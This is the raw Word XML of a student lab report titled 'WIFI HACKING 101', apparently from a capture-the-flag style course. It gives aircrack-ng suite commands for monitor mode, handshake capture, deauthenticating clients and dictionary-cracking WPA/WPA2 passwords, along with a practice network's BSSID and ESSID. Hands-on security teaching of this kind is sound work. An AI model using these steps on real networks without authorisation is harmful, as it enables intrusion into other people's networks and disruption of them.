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A13C6" w14:textId="313C7E74" w:rsidR="00885E6D" w:rsidRPr="00885E6D" w:rsidRDefault="00885E6D" w:rsidP="00885E6D">
      <w:r w:rsidRPr="00885E6D">
        <w:t>EXPT NO: 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00885E6D">
        <w:t xml:space="preserve">                                                                           </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                               </w:t>
      </w:r>
      <w:r w:rsidRPr="00885E6D">
        <w:t>    ROLL NO: 2207012</w:t>
      </w:r>
      <w:r w:rsidR="000C2EF3">
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D54894" w14:textId="7092A010" w:rsidR="00885E6D" w:rsidRPr="00885E6D" w:rsidRDefault="00885E6D" w:rsidP="00885E6D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00885E6D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00885E6D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>WIFI HACKING 101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C82B22A" w14:textId="316ADA84" w:rsidR="001D65CB" w:rsidRDefault="00885E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DD896" wp14:editId="493DC64D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-171450</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>324485</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6400800" cy="25400"/>
                <wp:effectExtent l="0" t="0" r="19050" b="31750"/>
                <wp:wrapNone/>
                <wp:docPr id="468246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EB18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CEs924AAAAAkBAAAPAAAAZHJzL2Rv&#10;d25yZXYueG1sTI/BTsMwEETvSPyDtUjcWseVCiWNUyEkDkhVKS0HenPtJQnEdog3bfh7lhMcd3Y0&#10;86ZYjb4VJ+xTE4MGNc1AYLDRNaHS8Lp/nCxAJDLBmTYG1PCNCVbl5UVhchfP4QVPO6oEh4SUGw01&#10;UZdLmWyN3qRp7DDw7z323hCffSVdb84c7ls5y7Ib6U0TuKE2HT7UaD93g9fwpp6+trb72O6f7frQ&#10;r2mzQRq0vr4a75cgCEf6M8MvPqNDyUzHOASXRKthMrvlLaRhrhQINtwtFAtHFuYKZFnI/wvKHwA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CEs924AAAAAkBAAAPAAAAAAAAAAAAAAAA&#10;ABcEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAJAUAAAAA&#10;" strokecolor="black [3213]" strokeweight=".5pt">
                <v:stroke joinstyle="miter"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="652F61C4" w14:textId="77777777" w:rsidR="00885E6D" w:rsidRPr="00885E6D" w:rsidRDefault="00885E6D" w:rsidP="00885E6D"/>
    <w:p w14:paraId="4AF57B73" w14:textId="0852BBCC" w:rsidR="00885E6D" w:rsidRPr="00885E6D" w:rsidRDefault="00885E6D" w:rsidP="00885E6D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00885E6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>AIM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468DBC73" w14:textId="77777777" w:rsidR="00885E6D" w:rsidRPr="00885E6D" w:rsidRDefault="00885E6D" w:rsidP="00885E6D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00885E6D">
        <w:t>To learn the fundamentals of WiFi security and practice capturing and cracking WPA/WPA2 handshakes using tools like aircrack-ng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AE7C40" w14:textId="5A13CF7F" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>PROCEDURE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E17166" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>Enable monitor mode on the wireless interface using airmon-ng start wlan0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C84134" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>Scan for available WiFi networks using airodump-ng wlan0mon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517A37FD" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>Identify the target network’s BSSID and channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C2C56B" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>Start capturing packets on the target channel with airodump-ng --bssid [BSSID] -c [channel] -w capture wlan0mon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431C71E9" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>Send deauthentication packets using aireplay-ng --deauth 10 -a [BSSID] wlan0mon to force a client to reconnect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354AE1E5" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>Once the handshake is captured, use aircrack-ng -w [wordlist.txt] capture-01.cap to attempt password cracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B501F67" w14:textId="49C1101B" w:rsidR="00885E6D" w:rsidRDefault="00CC4BA1" w:rsidP="00885E6D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>TASK-1 THE BASICS-AN INTRO TO WPA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F803A45" w14:textId="757436B7" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t xml:space="preserve"> Identify the Target Network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15483E43" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>Note the SSID (network name), BSSID (MAC address of the AP), and channel using airodump-ng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8957F9" w14:textId="70FC5EDC" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>Enable Monitor Mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2300B7D0" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>Use airmon-ng start wlan0 to enable monitor mode on your wireless adapter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D985D8F" w14:textId="2DC4FDAF" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t xml:space="preserve"> Capture the 4-Way Handshake:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094A1D3B" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>Run airodump-ng --bssid [BSSID] -c [channel] -w capture wlan0mon to monitor and capture handshake packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5011A8" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:lastRenderedPageBreak/>
        <w:t>Deauthenticate a connected client to force a handshake using aireplay-ng --deauth 5 -a [BSSID] wlan0mon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C26732" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>  Crack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t xml:space="preserve"> the Captured Handshake:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FDCB18" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>Use aircrack-ng -w [wordlist.txt] capture-01.cap to perform a dictionary attack using the ESSID as salt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2657332B" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="136A8FD5" w14:textId="3F2C6CD0" w:rsidR="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>TASK-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC4BA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC4BA1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1CF55386" wp14:editId="707D580A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2347595"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21384"/>
                <wp:lineTo x="21531" y="21384"/>
                <wp:lineTo x="21531" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="114725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5981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YOU ARE BEING WATCHED-CAPTURING PACKETS TO ATTACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E223520" w14:textId="4C64AA65" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t xml:space="preserve"> Enable monitor mode on your wireless network interface using airmon-ng start wlan0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415CE591" w14:textId="403082B4" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t xml:space="preserve"> Scan for nearby WiFi networks using airodump-ng wlan0mon and note down the BSSID and channel of the target network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DFB675" w14:textId="18426756" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t xml:space="preserve"> Start capturing packets on the target network with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5867649E" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>css</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118BF17F" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BC3E6C" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>airodump-ng --bssid [BSSID] -c [channel] -w capture wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B3924C" w14:textId="2322FE40" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t xml:space="preserve"> Deauthenticate a connected device to force a handshake by running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54003803" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>css</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2771B318" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF057B1" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>aireplay-ng --deauth 5 -a [BSSID] wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5260EF13" w14:textId="46831E91" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t xml:space="preserve">  Once the 4-way handshake is captured, crack the password using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9B55E5" w14:textId="188655A3" w:rsidR="00CC4BA1" w:rsidRDefault="00F87CC5" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F87CC5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4900CB4" wp14:editId="353E3D52">
            <wp:extent cx="5943600" cy="1062990"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="138601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18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BA1" w:rsidRPr="00CC4BA1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3112B943" wp14:editId="54975A6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699385"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21493"/>
                <wp:lineTo x="21531" y="21493"/>
                <wp:lineTo x="21531" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="113310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0134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65A85" w14:textId="4B63A468" w:rsidR="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>TASK-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC4BA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AirCrack-ng-LET’S GET CRACKING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76398C77" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>I will attach a capture for you to practice cracking on. If you are spending more than 3 mins cracking, something is likely wrong. (A single core VM on my laptop took around 1min).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CE9C9B" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>In order to crack the password, we can either use aircrack itself or create a hashcat file in order to use GPU acceleration. There are two different versions of hashcat output file, most likely you want 3.6+ as that will work with recent versions of hashcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495AA506" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>Useful Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3579B24B" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>BSSID: 02:1A:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>11:FF</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>:D9:BD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B9BC4B" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>ESSID: 'James Honor 8'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2BAE7" w14:textId="16553F5E" w:rsidR="00CC4BA1" w:rsidRDefault="00F87CC5" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F87CC5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F6CC8A6" wp14:editId="17313730">
            <wp:extent cx="5943600" cy="2740025"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="136187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71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D2A5" w14:textId="77777777" w:rsidR="00F87CC5" w:rsidRDefault="00F87CC5" w:rsidP="00F87CC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08506023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16DCC65B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0BD8E0F5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5CAA6007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2A41EBA7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44467131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5CD8E71C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5D099B4A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2D7A5568" w14:textId="08270C25" w:rsidR="00F87CC5" w:rsidRPr="00F87CC5" w:rsidRDefault="00F87CC5" w:rsidP="00F87CC5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="243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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F87CC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492B3B0A" w14:textId="77777777" w:rsidR="00F87CC5" w:rsidRPr="00F87CC5" w:rsidRDefault="00F87CC5" w:rsidP="00F87CC5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2430"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00F87CC5">
        <w:t>Successfully captured a WPA handshake and demonstrated cracking the password using a dictionary attack, highlighting the importance of strong WiFi passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165CB80F" w14:textId="1A84DAAF" w:rsidR="00F87CC5" w:rsidRPr="00F87CC5" w:rsidRDefault="00F87CC5" w:rsidP="00F87CC5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2430"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F87CC5" w:rsidRPr="00F87CC5" w:rsidSect="00885E6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632C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7398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43534"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA7E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93D96"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8D8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A49A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03C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9E17A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BA6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796837">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="579482398">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1980301969">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2078819636">
    <w:abstractNumId w:val="2"/>
